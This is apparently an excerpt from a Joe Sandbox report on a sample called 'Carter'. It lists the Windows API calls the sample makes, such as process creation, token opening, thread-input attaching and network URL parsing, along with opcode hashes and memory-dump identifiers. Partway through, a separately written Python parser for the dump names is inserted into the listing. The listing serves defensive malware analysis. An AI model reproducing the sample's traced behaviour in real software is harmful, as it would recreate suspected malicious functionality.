                                                                            • Sleep.KERNEL32(00000000,?,?,?,?,?,?,002D04EC,?,002D153F,?,00008000), ref: 002D1983
                                                                            • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,002D04EC,?,002D153F,?,00008000), ref: 002D198D
                                                                            • Sleep.KERNEL32(?,?,?,?,?,?,?,002D04EC,?,002D153F,?,00008000), ref: 002D19C0
                                                                            Similarity
                                                                            • API ID: CounterPerformanceQuerySleep
                                                                            • String ID:
                                                                            • API String ID: 2875609808-0
                                                                            APIs
                                                                            • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 002FE1EA
                                                                            • LoadTypeLibEx.OLEAUT32(?,00000002,0000000C), ref: 002FE201
                                                                            • RegisterTypeLib.OLEAUT32(0000000C,?,00000000), ref: 002FE216
                                                                            • RegisterTypeLibForUser.OLEAUT32(0000000C,?,00000000), ref: 002FE234
                                                                            Similarity
                                                                            • API ID: Type$Register$FileLoadModuleNameUser
                                                                            • String ID:
                                                                            • API String ID: 1352324309-0
                                                                            APIs
                                                                            Similarity
                                                                            • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                            • String ID:
                                                                            • API String ID: 3016257755-0
                                                                            APIs
                                                                            • GetWindowRect.USER32(?,?), ref: 002FB956
                                                                            • ScreenToClient.USER32(?,?), ref: 002FB96E
                                                                            • ScreenToClient.USER32(?,?), ref: 002FB992
                                                                            • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 002FB9AD
                                                                            Similarity
                                                                            • API ID: ClientRectScreen$InvalidateWindow
                                                                            • String ID:
                                                                            • API String ID: 357397906-0
                                                                            APIs
                                                                            • _memset.LIBCMT ref: 002FBCB6
                                                                            • _memset.LIBCMT ref: 002FBCC5
                                                                            • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00338F20,00338F64), ref: 002FBCF4
                                                                            • CloseHandle.KERNEL32 ref: 002FBD06
                                                                            Similarity
                                                                            • API ID: _memset$CloseCreateHandleProcess
                                                                            • String ID:
                                                                            • API String ID: 3277943733-0
                                                                            • Opcode ID: c58be60c801ccf344c7f52b87a562de445a2b0896f5bac35ab75b46e33a6388c
                                                                            • Instruction ID: 966e0e97a42cd2cfcb2385e631837ca521ee4458830817ad512947705682d32b
                                                                            • Opcode Fuzzy Hash: c58be60c801ccf344c7f52b87a562de445a2b0896f5bac35ab75b46e33a6388c
                                                                            • Instruction Fuzzy Hash: 9BF082B65503047FE7526BA5BC85FBB3B5DEB08751F000421BA08D61A2DF714D2087A8
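The "Memory Dump Source" block repeated in every record above names the dumped regions with a fixed dot-separated identifier. The following is an added example, not Joe Sandbox's own tooling, that parses those identifiers and cross-checks them against the IDA snapshot name. The field meanings are inferred from the listing itself: the first field (0x1D = 29) and the module base 0x270000 match `hcaresult_29_2_270000_Carter.jbxd`, and the fifth field takes the values 0x20, 0x02 and 0x04 on the code, read-only and writable sections, which matches the Windows PAGE_EXECUTE_READ, PAGE_READONLY and PAGE_READWRITE constants. Treating that field as a PAGE_* protection is therefore an assumption; the last three fields are kept raw because the page does not document them. The sample record is constructed from the lines above, including the "Download File" link residue the parser tolerates.

```python
"""Parse Joe Sandbox memory-dump identifiers (added example, not the report's own code)."""
import re
from dataclasses import dataclass
from typing import List, Optional, Sequence, Tuple

# Windows PAGE_* protection constants from winnt.h. ASSUMPTION: the fifth
# field of the dump name is one of these; it fits every section in the listing.
PAGE_PROTECTION = {
    0x01: "PAGE_NOACCESS",
    0x02: "PAGE_READONLY",
    0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY",
    0x10: "PAGE_EXECUTE",
    0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE",
    0x80: "PAGE_EXECUTE_WRITECOPY",
}
_EXECUTABLE = {0x10, 0x20, 0x40, 0x80}

# <procidx>.<stage>.<id>.<base16>.<prot>.<f6>.<f7>.<f8>.sdmp
_DUMP_RE = re.compile(
    r"^([0-9A-Fa-f]{8})\.([0-9A-Fa-f]{8})\.(\d+)\.([0-9A-Fa-f]{16})"
    r"\.([0-9A-Fa-f]{8})\.([0-9A-Fa-f]{8})\.([0-9A-Fa-f]{8})\.([0-9A-Fa-f]{8})\.sdmp$"
)
_SOURCE_RE = re.compile(
    r"Source File:\s*(\S+\.sdmp),\s*Offset:\s*([0-9A-Fa-f]+),\s*based on PE:\s*(true|false)"
)
_SNAPSHOT_RE = re.compile(r"^hcaresult_(\d+)_(\d+)_([0-9A-Fa-f]+)_\w+\.jbxd$")


@dataclass(frozen=True)
class DumpName:
    process_index: int          # field 1, hex; 0x1D == 29 in the listing
    stage: int                  # field 2, hex; the "_2_" of the snapshot name
    dump_id: str                # field 3, kept opaque
    base_address: int           # field 4, hex region start
    protection: int             # field 5, PAGE_* value (assumption, see above)
    tail: Tuple[int, int, int]  # fields 6-8, undocumented on the page

    @property
    def protection_name(self) -> str:
        return PAGE_PROTECTION.get(self.protection, "UNKNOWN(0x%02X)" % self.protection)

    @property
    def executable(self) -> bool:
        return self.protection in _EXECUTABLE


def parse_dump_name(name: str) -> DumpName:
    m = _DUMP_RE.match(name.strip())
    if not m:
        raise ValueError("not a dump file name: %r" % name)
    f = m.groups()
    return DumpName(int(f[0], 16), int(f[1], 16), f[2], int(f[3], 16), int(f[4], 16),
                    (int(f[5], 16), int(f[6], 16), int(f[7], 16)))


def parse_record(lines: Sequence[str]) -> Tuple[Optional[int], List[DumpName]]:
    """Return (module base from 'Offset:', dumps) for one Memory Dump Source block."""
    module_base = None
    dumps: List[DumpName] = []
    for raw in lines:
        line = raw.strip().lstrip("•").strip()
        m = _SOURCE_RE.search(line)
        if m:
            module_base = int(m.group(2), 16)
            dumps.append(parse_dump_name(m.group(1)))
        elif line.startswith("Associated:"):
            # The rendered page fuses a "Download File" link onto the name; drop it.
            name = line.split(":", 1)[1].replace("Download File", "").strip()
            dumps.append(parse_dump_name(name))
    return module_base, dumps


def snapshot_matches(snapshot: str, module_base: int, dump: DumpName) -> bool:
    """True when hcaresult_<pid>_<stage>_<base>_<name>.jbxd refers to the same
    process index, stage and module base as the dump."""
    m = _SNAPSHOT_RE.match(snapshot)
    if not m:
        return False
    return (int(m.group(1)) == dump.process_index
            and int(m.group(2)) == dump.stage
            and int(m.group(3), 16) == module_base)


def executable_regions(dumps: Sequence[DumpName]) -> List[DumpName]:
    return [d for d in dumps if d.executable]


# Constructed sample: the record as it appears in the listing above.
SAMPLE_RECORD = [
    "• Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true",
    "• Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File",
    "• Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmp",
    "• Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmp",
    "• Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmp",
    "• Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmp",
]

if __name__ == "__main__":
    base, dumps = parse_record(SAMPLE_RECORD)
    for d in dumps:
        print("pid=%d stage=%d base=0x%X %s" % (d.process_index, d.stage, d.base_address, d.protection_name))
    print("snapshot matches:", snapshot_matches("hcaresult_29_2_270000_Carter.jbxd", base, dumps[0]))
```

Only the region with the 0x20 protection is executable, which is where the disassembled functions and their `ref:` addresses (002FBCB6 and so on) live; the other dumps are the module's data sections.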
                                                                            APIs
                                                                            • EnterCriticalSection.KERNEL32(?), ref: 002D71A1
                                                                              • Part of subcall function 002D7C7F: _memset.LIBCMT ref: 002D7CB4
                                                                            • _memmove.LIBCMT ref: 002D71C4
                                                                            • _memset.LIBCMT ref: 002D71D1
                                                                            • LeaveCriticalSection.KERNEL32(?), ref: 002D71E1
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                             • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmp
                                                                             • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmp
                                                                             • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmp
                                                                             • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmp
                                                                             • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: CriticalSection_memset$EnterLeave_memmove
                                                                            • String ID:
                                                                            • API String ID: 48991266-0
                                                                            • Opcode ID: 4eaeae436df5c920d87c41957c9a1e30873fbcc6a6b9be3bef442552107a6289
                                                                            • Instruction ID: f29644791ba8e2c61c2bc9897c2684ac6f12f0eda261366c709698a090cad2e8
                                                                            • Opcode Fuzzy Hash: 4eaeae436df5c920d87c41957c9a1e30873fbcc6a6b9be3bef442552107a6289
                                                                            • Instruction Fuzzy Hash: 74F05E3A211100ABCF066F95DC85B4ABB29EF45320F08C052FE085E22ACB31A921DFB4
                                                                            APIs
                                                                              • Part of subcall function 002716CF: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00271729
                                                                              • Part of subcall function 002716CF: SelectObject.GDI32(?,00000000), ref: 00271738
                                                                              • Part of subcall function 002716CF: BeginPath.GDI32(?), ref: 0027174F
                                                                              • Part of subcall function 002716CF: SelectObject.GDI32(?,00000000), ref: 00271778
                                                                            • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 002FC3E8
                                                                            • LineTo.GDI32(00000000,?,?), ref: 002FC3F5
                                                                            • EndPath.GDI32(00000000), ref: 002FC405
                                                                            • StrokePath.GDI32(00000000), ref: 002FC413
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                             • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmp
                                                                             • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmp
                                                                             • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmp
                                                                             • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmp
                                                                             • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                                            • String ID:
                                                                            • API String ID: 1539411459-0
                                                                            • Opcode ID: e40a51af39a7d3e4c762122578525b137d81eefd8292c1ab59262a842c32d39c
                                                                            • Instruction ID: 493dbe2a83918145399588a5b469b3f11f4c1c04ad024e5206f6b8ce8525e9c5
                                                                            • Opcode Fuzzy Hash: e40a51af39a7d3e4c762122578525b137d81eefd8292c1ab59262a842c32d39c
                                                                            • Instruction Fuzzy Hash: 15F0BE3100621DBAEB232F54AC1EFDE3F9DAF05310F048001FB11251E187B41560DFA9
                                                                            APIs
                                                                            • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 002CAA6F
                                                                            • GetWindowThreadProcessId.USER32(?,00000000), ref: 002CAA82
                                                                            • GetCurrentThreadId.KERNEL32 ref: 002CAA89
                                                                            • AttachThreadInput.USER32(00000000), ref: 002CAA90
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                             • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmp
                                                                             • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmp
                                                                             • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmp
                                                                             • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmp
                                                                             • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                                            • String ID:
                                                                            • API String ID: 2710830443-0
                                                                            • Opcode ID: 057af1df3f5ea125c1fc5832836b9c84b131d7e660d3699f9a41d63c1db26fca
                                                                            • Instruction ID: 55d9b45588c7dc1a69febddc5a2ef06542d913736de6ac2f50cc83843808fa54
                                                                            • Opcode Fuzzy Hash: 057af1df3f5ea125c1fc5832836b9c84b131d7e660d3699f9a41d63c1db26fca
                                                                            • Instruction Fuzzy Hash: 44E0393154222CBADB225FA29D1CFEB3F6DEF157A1F008116F50984060CA728560CBA0
                                                                            APIs
                                                                            • GetSysColor.USER32(00000008), ref: 0027260D
                                                                            • SetTextColor.GDI32(?,000000FF), ref: 00272617
                                                                            • SetBkMode.GDI32(?,00000001), ref: 0027262C
                                                                            • GetStockObject.GDI32(00000005), ref: 00272634
                                                                            • GetWindowDC.USER32(?,00000000), ref: 002AC1C4
                                                                            • GetPixel.GDI32(00000000,00000000,00000000), ref: 002AC1D1
                                                                            • GetPixel.GDI32(00000000,?,00000000), ref: 002AC1EA
                                                                            • GetPixel.GDI32(00000000,00000000,?), ref: 002AC203
                                                                            • GetPixel.GDI32(00000000,?,?), ref: 002AC223
                                                                            • ReleaseDC.USER32(?,00000000), ref: 002AC22E
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                             • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmp
                                                                             • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmp
                                                                             • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmp
                                                                             • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmp
                                                                             • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                                            • String ID:
                                                                            • API String ID: 1946975507-0
                                                                            • Opcode ID: 18f4b9008efc0f04541ebc3bd8c63239f3923eb310471a8ebc17e36d10b31f52
                                                                            • Instruction ID: 171e8cb766d8a57f0c21a7ca259437789a959d927c355efb06fb461265a82f5d
                                                                            • Opcode Fuzzy Hash: 18f4b9008efc0f04541ebc3bd8c63239f3923eb310471a8ebc17e36d10b31f52
                                                                            • Instruction Fuzzy Hash: 9FE06D35605244BBDB2A5FB8AC09BD83B19EB16332F148367FA69480E18B7149A0DB11
                                                                            APIs
                                                                            • GetCurrentThread.KERNEL32 ref: 002C9339
                                                                            • OpenThreadToken.ADVAPI32(00000000,?,?,?,002C8F04), ref: 002C9340
                                                                            • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,002C8F04), ref: 002C934D
                                                                            • OpenProcessToken.ADVAPI32(00000000,?,?,?,002C8F04), ref: 002C9354
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                             • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmp
                                                                             • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmp
                                                                             • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmp
                                                                             • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmp
                                                                             • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: CurrentOpenProcessThreadToken
                                                                            • String ID:
                                                                            • API String ID: 3974789173-0
                                                                            • Opcode ID: 6d968a4d77fb90156b66d5a395ac562b28db9a3becf3381354094b384c935b73
                                                                            • Instruction ID: c09786e3292c2a7c817d5d2b3341a35aa12e45d0fe3b4c0cf079676188c3a410
                                                                            • Opcode Fuzzy Hash: 6d968a4d77fb90156b66d5a395ac562b28db9a3becf3381354094b384c935b73
                                                                            • Instruction Fuzzy Hash: 48E04676602212ABD7261FF1AD0DB563BACBF507A2F108859B285CA090EA389484CB64
                                                                            APIs
                                                                            • GetDesktopWindow.USER32 ref: 002B0679
                                                                            • GetDC.USER32(00000000), ref: 002B0683
                                                                            • GetDeviceCaps.GDI32(00000000,0000000C), ref: 002B06A3
                                                                            • ReleaseDC.USER32(?), ref: 002B06C4
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                             • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmp
                                                                             • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmp
                                                                             • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmp
                                                                             • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmp
                                                                             • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: CapsDesktopDeviceReleaseWindow
                                                                            • String ID:
                                                                            • API String ID: 2889604237-0
                                                                            • Opcode ID: 00d1a182402f18f44b9e539a4cfc4ebedf2efcf4d0f32618828cb77a4ac9cfd3
                                                                            • Instruction ID: 13248862330182c60e79303d681fd7be1f3aef9fc4082ccadc46f8adc8f0cfbf
                                                                            • Opcode Fuzzy Hash: 00d1a182402f18f44b9e539a4cfc4ebedf2efcf4d0f32618828cb77a4ac9cfd3
                                                                            • Instruction Fuzzy Hash: 4AE01A71811608EFCB069FA0D818B9D7BFAEB8C350F11C006F95AA7210CB7985619F50
                                                                            APIs
                                                                            • GetDesktopWindow.USER32 ref: 002B068D
                                                                            • GetDC.USER32(00000000), ref: 002B0697
                                                                            • GetDeviceCaps.GDI32(00000000,0000000C), ref: 002B06A3
                                                                            • ReleaseDC.USER32(?), ref: 002B06C4
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                             • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmp
                                                                             • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmp
                                                                             • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmp
                                                                             • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmp
                                                                             • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: CapsDesktopDeviceReleaseWindow
                                                                            • String ID:
                                                                            • API String ID: 2889604237-0
                                                                            • Opcode ID: 0c0a6bbe4e7d1e67e30d92287068a2b0e384d473ba43557574b79eb55fd8e9aa
                                                                            • Instruction ID: b5651a43725671a5d1176fdff3b025c64087b2fc1dc611fd1ff976acfacef2c3
                                                                            • Opcode Fuzzy Hash: 0c0a6bbe4e7d1e67e30d92287068a2b0e384d473ba43557574b79eb55fd8e9aa
                                                                            • Instruction Fuzzy Hash: D4E01A71801608EFCB169F60D81875D7BFAEB8C314F108006F959A7210CB7995518F50
                                                                            APIs
                                                                              • Part of subcall function 0028436A: _wcscpy.LIBCMT ref: 0028438D
                                                                              • Part of subcall function 00274D37: __itow.LIBCMT ref: 00274D62
                                                                              • Part of subcall function 00274D37: __swprintf.LIBCMT ref: 00274DAC
                                                                            • __wcsnicmp.LIBCMT ref: 002DB670
                                                                            • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 002DB739
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                             • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmp
                                                                             • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmp
                                                                             • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmp
                                                                             • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmp
                                                                             • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                                                                            • String ID: LPT
                                                                            • API String ID: 3222508074-1350329615
                                                                            • Opcode ID: dad9eb52265aa3c8c12a335ea154dcc8c338c89606a91fc0b1f45c73fb477e2e
                                                                            • Instruction ID: f1f73f7943bea084507d4d0c910bf38154f4d4dae46f2c36ac67845e6295d6e5
                                                                            • Opcode Fuzzy Hash: dad9eb52265aa3c8c12a335ea154dcc8c338c89606a91fc0b1f45c73fb477e2e
                                                                            • Instruction Fuzzy Hash: 9A619376A20215EFDB15EF54C891EAEB7B4EF48310F11805AF54AAB391D770AE50CF90
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                             • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmp
                                                                             • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmp
                                                                             • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmp
                                                                             • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmp
                                                                             • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: _memmove
                                                                            • String ID: #V(
                                                                            • API String ID: 4104443479-471757699
                                                                            • Opcode ID: a7eec21b072e8476cf5dba321e76275386dfefaa2f46d491f49158c3e00d5aad
                                                                            • Instruction ID: ca4cd944769aaea418bd648ff1be74e65e2465ea5e948b38a6a21bf860771a13
                                                                            • Opcode Fuzzy Hash: a7eec21b072e8476cf5dba321e76275386dfefaa2f46d491f49158c3e00d5aad
                                                                            • Instruction Fuzzy Hash: A251727092460ADFCF64CFA8C880AEEBBF1FF45344F248529E85AD7250E731A965CB51
                                                                            APIs
                                                                            • Sleep.KERNEL32(00000000), ref: 0027E01E
                                                                            • GlobalMemoryStatusEx.KERNEL32(?), ref: 0027E037
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                             • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmp
                                                                             • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmp
                                                                             • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmp
                                                                             • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmp
                                                                             • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: GlobalMemorySleepStatus
                                                                            • String ID: @
                                                                            • API String ID: 2783356886-2766056989
                                                                            • Opcode ID: f429446c55e25e3ed53d370edd3842a7447fca726841d7e8b008a23e9e9e316e
                                                                            • Instruction ID: d7b3499a63446c92450b68fddbde89671442905cc63820b6cd20dc6499bfa6cd
                                                                            • Opcode Fuzzy Hash: f429446c55e25e3ed53d370edd3842a7447fca726841d7e8b008a23e9e9e316e
                                                                            • Instruction Fuzzy Hash: 8D512672418744DBE321AF50EC86BABBBE8FB84714F51885DF2D8411A1DB7095398B26
                                                                            APIs
                                                                            • SendMessageW.USER32(00000027,00001132,00000000,?), ref: 002F8186
                                                                            • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 002F819B
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend
                                                                            • String ID: '
                                                                            • API String ID: 3850602802-1997036262
                                                                            • Opcode ID: 2e7413c8057a66a5a38c29371a6fdeeed84584ae6f50bb9e692cb52deda0d022
                                                                            • Instruction ID: 16f6d3a087c1efa3de168d1eda6c64a7017a060a4c7decaf86e05fc6e289ebd1
                                                                            • Opcode Fuzzy Hash: 2e7413c8057a66a5a38c29371a6fdeeed84584ae6f50bb9e692cb52deda0d022
                                                                            • Instruction Fuzzy Hash: 15410C74A1120D9FDB14CF64C881BEABBB9FB08340F50017AEA08EB351DB71A955CF90
                                                                            APIs
                                                                            • _memset.LIBCMT ref: 002E2C6A
                                                                            • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 002E2CA0
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: CrackInternet_memset
                                                                            • String ID: |
                                                                            • API String ID: 1413715105-2343686810
                                                                            • Opcode ID: 82ba33a0ec5c29612f53d8ad465789eb628af8739f9bace6f5606fbc8e6674bd
                                                                            • Instruction ID: bc18fa0a805a356f37e1ac8e1d2314ab8e77f77dbe12663bda0b3c3105b722c1
                                                                            • Opcode Fuzzy Hash: 82ba33a0ec5c29612f53d8ad465789eb628af8739f9bace6f5606fbc8e6674bd
                                                                            • Instruction Fuzzy Hash: 8F31F775821119EBCF11EFA1CC85AEEBBB9FF04310F100059E915A61A2EB715966DFA0
                                                                            APIs
                                                                            • DestroyWindow.USER32(?,?,?,?), ref: 002F713C
                                                                            • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 002F7178
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
